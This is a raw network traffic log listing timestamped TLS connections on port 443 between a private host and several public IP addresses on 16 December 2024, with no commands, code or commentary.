                                                                                                                                                                                                                                                Dec 16, 2024 15:40:13.735280991 CET49882443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:13.735280991 CET49882443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:13.735296965 CET44349882116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:13.735310078 CET44349882116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:13.735409975 CET49882443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:13.735440016 CET44349882116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:13.736124039 CET49882443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:13.736181021 CET44349882116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:13.738969088 CET49882443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:13.739001989 CET44349882116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:13.742292881 CET49882443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:13.742325068 CET44349882116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:13.742341042 CET49882443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:13.742355108 CET44349882116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:13.742471933 CET49882443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:13.742492914 CET44349882116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:13.742511988 CET49882443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:13.742522955 CET44349882116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:13.742533922 CET49882443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:13.742546082 CET44349882116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:13.742669106 CET49882443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:13.742686987 CET44349882116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:13.742701054 CET49882443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:13.742710114 CET44349882116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:13.742727041 CET49882443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:13.742738008 CET44349882116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:13.742803097 CET49882443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:13.742816925 CET44349882116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:13.742832899 CET49882443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:13.742851019 CET44349882116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:13.742882967 CET49882443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:13.742896080 CET44349882116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:13.742917061 CET49882443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:13.742938995 CET44349882116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:13.742973089 CET49882443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:13.742986917 CET44349882116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:13.743244886 CET49882443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:13.743272066 CET49882443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:13.743280888 CET49882443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:13.747186899 CET49880443192.168.2.718.173.219.84
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:13.747219086 CET4434988018.173.219.84192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:13.783346891 CET44349882116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:13.794404030 CET49880443192.168.2.718.173.219.84
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:14.626801014 CET44349874116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:14.626878023 CET44349874116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:14.626878977 CET49874443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:14.626980066 CET49874443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:14.627929926 CET49874443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:14.627954006 CET44349874116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:15.334281921 CET49902443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:15.334320068 CET44349902116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:15.334379911 CET49902443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:15.334604979 CET49902443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:15.334619999 CET44349902116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:15.955463886 CET44349882116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:15.955554962 CET44349882116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:15.955627918 CET49882443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:15.956471920 CET49882443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:15.956494093 CET44349882116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:16.076059103 CET49904443192.168.2.723.58.157.24
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:16.076098919 CET4434990423.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:16.076220989 CET49904443192.168.2.723.58.157.24
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:16.076406956 CET49904443192.168.2.723.58.157.24
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:16.076417923 CET4434990423.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:16.108071089 CET49876443192.168.2.723.58.157.24
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:16.151321888 CET4434987623.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:16.405194044 CET49909443192.168.2.723.58.157.24
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:16.405230999 CET4434990923.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:16.405529976 CET49909443192.168.2.723.58.157.24
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:16.405926943 CET49909443192.168.2.723.58.157.24
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:16.405937910 CET4434990923.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:16.427386999 CET4434987623.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:16.427520990 CET4434987623.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:16.428546906 CET49876443192.168.2.723.58.157.24
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:16.431523085 CET49876443192.168.2.723.58.157.24
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:16.431538105 CET4434987623.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:16.524810076 CET49910443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:16.524846077 CET44349910116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:16.525011063 CET49910443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:16.525405884 CET49910443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:16.525414944 CET44349910116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:16.748996973 CET44349902116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:16.749073029 CET49902443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:16.749581099 CET49902443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:16.749591112 CET44349902116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:16.751480103 CET49902443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:16.751487970 CET44349902116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:16.751637936 CET49902443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:16.751656055 CET44349902116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:16.751746893 CET49902443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:16.751760960 CET44349902116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:16.751770973 CET49902443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:16.751780987 CET44349902116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:16.751811981 CET49902443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:16.751812935 CET49902443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:16.751821995 CET44349902116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:16.751828909 CET44349902116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:16.751842022 CET49902443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:16.751895905 CET49902443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:16.751900911 CET44349902116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:16.751914024 CET44349902116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:16.752185106 CET49902443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:16.752197981 CET44349902116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:16.752252102 CET49902443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:16.752269983 CET44349902116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:16.752290964 CET49902443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:16.752300024 CET44349902116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:16.752305031 CET49902443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:16.752307892 CET44349902116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:17.318367004 CET4434990423.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:17.318670034 CET49904443192.168.2.723.58.157.24
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:17.318695068 CET4434990423.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:17.319009066 CET4434990423.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:17.319511890 CET49904443192.168.2.723.58.157.24
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:17.319571018 CET4434990423.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:17.370285034 CET49904443192.168.2.723.58.157.24
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:17.648808002 CET4434990923.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:17.652892113 CET49909443192.168.2.723.58.157.24
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:17.652903080 CET4434990923.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:17.653321028 CET4434990923.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:17.654201031 CET49909443192.168.2.723.58.157.24
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:17.654258013 CET4434990923.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:17.700737953 CET49909443192.168.2.723.58.157.24
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:17.982379913 CET44349910116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:17.982496977 CET49910443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:17.982996941 CET49910443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:17.983006001 CET44349910116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:17.984963894 CET49910443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:17.984972000 CET44349910116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:17.985024929 CET49910443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:17.985040903 CET44349910116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:17.985121965 CET49910443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:17.985126972 CET44349910116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:17.985205889 CET49910443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:17.985219002 CET44349910116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:17.985236883 CET49910443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:17.985248089 CET44349910116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:17.985387087 CET49910443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:17.985439062 CET44349910116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:17.985528946 CET49910443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:17.985542059 CET44349910116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:17.985565901 CET49910443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:17.985579967 CET44349910116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:17.985595942 CET49910443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:17.985610008 CET44349910116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:17.985671997 CET49910443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:17.985691071 CET49910443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:17.985698938 CET44349910116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:17.985716105 CET49910443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:17.985722065 CET44349910116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:17.985743046 CET44349910116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:17.985774994 CET49910443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:17.985788107 CET44349910116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:17.985805035 CET49910443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:17.985815048 CET44349910116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:17.985857964 CET49910443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:17.985881090 CET49910443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:17.985893011 CET44349910116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:17.985903978 CET49910443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:17.985913992 CET44349910116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:17.985934019 CET44349910116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:17.985946894 CET49910443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:17.985966921 CET44349910116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:17.986061096 CET49910443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:17.986071110 CET44349910116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:17.986089945 CET49910443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:17.986099005 CET44349910116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:17.986118078 CET49910443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:17.986135960 CET49910443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:17.986139059 CET44349910116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:17.986155987 CET49910443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:17.986167908 CET44349910116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:17.986179113 CET49910443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:17.986191988 CET49910443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:17.986223936 CET49910443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:17.986241102 CET44349910116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:17.986253023 CET49910443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:17.986262083 CET49910443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:17.986274958 CET49910443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:17.986315012 CET49910443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:17.986337900 CET49910443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:17.986341000 CET44349910116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:17.986382961 CET44349910116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:17.986404896 CET49910443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:17.986430883 CET49910443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:17.986457109 CET49910443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:17.986470938 CET44349910116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:17.986511946 CET44349910116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:17.986520052 CET49910443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:17.986542940 CET49910443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:17.986583948 CET49910443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:17.986608028 CET49910443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:17.986649036 CET49910443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:17.986689091 CET49910443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:17.986707926 CET49910443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:17.986740112 CET49910443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:17.986772060 CET49910443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:18.027345896 CET44349910116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:18.027591944 CET49910443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:18.027632952 CET49910443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:18.027647018 CET49910443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:18.027688026 CET49910443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:18.027750969 CET49910443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:18.027775049 CET49910443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:18.027822018 CET49910443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:18.027833939 CET49910443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:18.027852058 CET49910443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:18.027903080 CET49910443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:18.075331926 CET44349910116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:18.075989008 CET49910443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:18.076248884 CET49910443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:18.076404095 CET49910443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:18.076433897 CET49910443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:18.076565027 CET49910443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:18.076592922 CET49910443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:18.076658964 CET49910443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:18.076688051 CET49910443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:18.076730967 CET49910443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:18.119328976 CET44349910116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:18.125248909 CET49910443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:18.125482082 CET49910443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:18.125498056 CET49910443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:18.125540972 CET49910443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:18.125582933 CET49910443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:18.125616074 CET49910443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:18.125653028 CET49910443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:18.125686884 CET49910443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:18.125714064 CET49910443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:18.167327881 CET44349910116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:18.167511940 CET49910443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:18.167536020 CET49910443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:18.167577028 CET49910443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:18.167589903 CET49910443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:18.167625904 CET49910443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:18.211338997 CET44349910116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:18.227925062 CET44349910116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:18.228086948 CET49910443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:18.228142023 CET44349910116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:18.228184938 CET44349910116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:18.228617907 CET49910443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:18.228652954 CET44349910116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:18.228777885 CET49910443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:18.266213894 CET49910443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:18.266262054 CET44349910116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:18.278500080 CET49873443192.168.2.720.110.205.119
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:18.287965059 CET49880443192.168.2.718.173.219.84
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:18.323333979 CET4434987320.110.205.119192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:18.331327915 CET4434988018.173.219.84192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:18.574445009 CET44349902116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:18.574522018 CET49902443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:18.574546099 CET44349902116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:18.574563980 CET44349902116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:18.574664116 CET49902443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:18.574750900 CET44349910116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:18.574923038 CET49910443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:18.575012922 CET44349910116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:18.575057030 CET44349910116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:18.575241089 CET49910443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:18.576909065 CET49902443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:18.576925993 CET44349902116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:18.577670097 CET49916443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:18.577713013 CET44349916116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:18.577797890 CET49916443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:18.578043938 CET49916443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:18.578057051 CET44349916116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:18.590003014 CET49917443192.168.2.713.69.239.72
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:18.590030909 CET4434991713.69.239.72192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:18.590085030 CET49917443192.168.2.713.69.239.72
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:18.590317011 CET49917443192.168.2.713.69.239.72
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:18.590329885 CET4434991713.69.239.72192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:18.619323015 CET44349910116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:18.645807981 CET4434988018.173.219.84192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:18.645895958 CET4434988018.173.219.84192.168.2.7
